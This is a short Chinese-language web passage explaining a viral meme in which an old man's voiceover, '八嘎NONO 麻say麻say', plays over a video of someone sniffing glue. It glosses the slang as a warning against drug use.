大家有沒有看過一個網路上流傳的迷因，影片中一個神情古怪的人抓著塑膠袋在吸，疑似是在吸強力膠（有毒品的成份）。而背景聲是一個阿伯用很獨特的口音在說：謀巴，八嘎NONO，麻say麻say。

八嘎NONO 麻say麻say的意思

迷因中阿伯說的「八嘎NONO 麻say麻say」其實是在勸誡吸毒。

巴（ㄅㄚ-）通常是指打巴掌，不過在吸毒相關的行話是在說「吸食」。NONO (ㄋㄡˊㄋㄡˊ)，是形容一個人神智不清，軟爛的樣子。
八嘎NONO意思是吸到整個人神智不清，看起來笨笨的，軟爛的樣子。
